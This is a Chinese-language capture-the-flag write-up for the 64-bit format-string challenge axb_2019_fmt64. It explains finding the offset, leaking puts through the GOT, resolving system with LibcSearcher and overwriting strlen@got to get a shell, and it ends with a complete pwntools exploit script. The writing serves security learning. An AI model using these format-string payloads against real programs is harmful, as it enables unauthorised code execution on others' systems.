axb_2019_fmt64
步骤:
- 例行检查,64位程序,只开启了nx保护
- 本地运行看一下,可以一直输入
- 64位ida打开
跟axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据
利用过程
- 首先找一下偏移,偏移为8
- 找到偏移后我们就可以泄露libc,计算system和bin/sh了
一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s"
,失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式化字符串利用,可以看这篇文章,建议先看一下这篇文章,64位跟32位的关于格式化字符串漏洞的利用有点不一样。
所以这边要稍微变化一下payload = "%9$sAAAA" + p64(puts_got)
payload1 = "%9$s" + "AAAA" + p64(puts_got)
p.sendafter("Please tell me:",payload1)
p.recvuntil("Repeater:"))
puts_addr = u64(p.recvuntil("\x7f").ljust(8,"\x00"))
libc = LibcSearcher("puts",puts_addr)
libcbase = puts_addr - libc.dump("puts")
system_addr = libcbase + libc.dump("system")
bin_sh = libcbase + libc.dump("str_bin_sh")
- 接下来就是要将printf@got给替换成sys_addr的值,就是将got表中printf的函数地址给修改成system的函数地址,这样再次传入参数 ‘/bin/sh’ 在执行printf时,由于将got表给修改了,就相当于执行了system 函数 即:执行system(‘/bin/sh’)
由于64位程序,不能直接修改,一次只能修改几个字节,具体的看上面我给的那篇文章的链接
看图可知,puts和system函数的地址只有最后一点不一样,我们只用修改不同的那个地方即可,由于一次只能修改一个字节,就将要修改的地方分成了高低字节做两次修改,
首先修改高字节,将d1改成cf,相对偏移是12,用"%" + str(high_sys - 9) + "c%12$hhn"
,-9是因为一开始会输出Repeater:
,长度为9,然后将c690改成2390,用"%" + str(low_sys - high_sys) + "c%13$hn"
high_sys = (system_addr >> 16) & 0xff
low_sys = system_addr & 0xffff
print('sys'+hex(system_addr))
print('low'+hex(low_sys))
print('high'+hex(high_sys))
payload2 = "%" + str(high_sys - 9) + "c%12$hhn" + "%" + str(low_sys - high_sys) + "c%13$hn"
print(len(payload2))
print(payload2)
payload2 = payload2.ljust(32,"A") + p64(sprint_got + 2) + p64(sprint_got)
将sprintf@got修改成system后传入参数bin/sh即可获得shell
好奇怪,为什么我修改sprintf没成功,修改strlen@got就成功了,懵
完整exp
# coding=utf-8
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level='debug'
#io = process('./axb_2019_fmt64')
io = remote("node3.buuoj.cn",25577)
elf = ELF("./axb_2019_fmt64")
puts_got = elf.got["puts"]
sprintf_got = elf.got["sprintf"]
strlen_got = elf.got["strlen"]
print hex(puts_got)
#payload1 = p64(puts_got)+"%08$s"
payload1 = "%9$s" + "AAAA" + p64(puts_got)
io.sendafter("Please tell me:",payload1)
print(io.recvuntil("Repeater:"))
puts_addr = u64(io.recvuntil("\x7f").ljust(8,"\x00"))
print("puts_addr ---> ",hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
libcbase = puts_addr - libc.dump("puts")
system_addr = libcbase + libc.dump("system")
bin_sh = libcbase + libc.dump("str_bin_sh")
print("system_addr ---> ", hex(system_addr))
print("bin_sh ---> ", hex(bin_sh))
high_sys = (system_addr >> 16) & 0xff
low_sys = system_addr & 0xffff
print('sys'+hex(system_addr))
print('low'+hex(low_sys))
print('high'+hex(high_sys))
payload2 = "%" + str(high_sys - 9) + "c%12$hhn" + "%" + str(low_sys - high_sys) + "c%13$hn"
print(len(payload2))
print(payload2)
payload2 = payload2.ljust(32,"A") + p64(strlen_got + 2) + p64(strlen_got)
io.sendafter("Please tell me:",payload2)
payload3 = ';/bin/sh\x00'
io.sendafter("Please tell me:",payload3)
io.interactive()
io.close()
参考链接:https://www.anquanke.com/post/id/194458?display=mobile
https://www.yuque.com/chenguangzhongdeyimoxiao/xx6p74/zg7u7w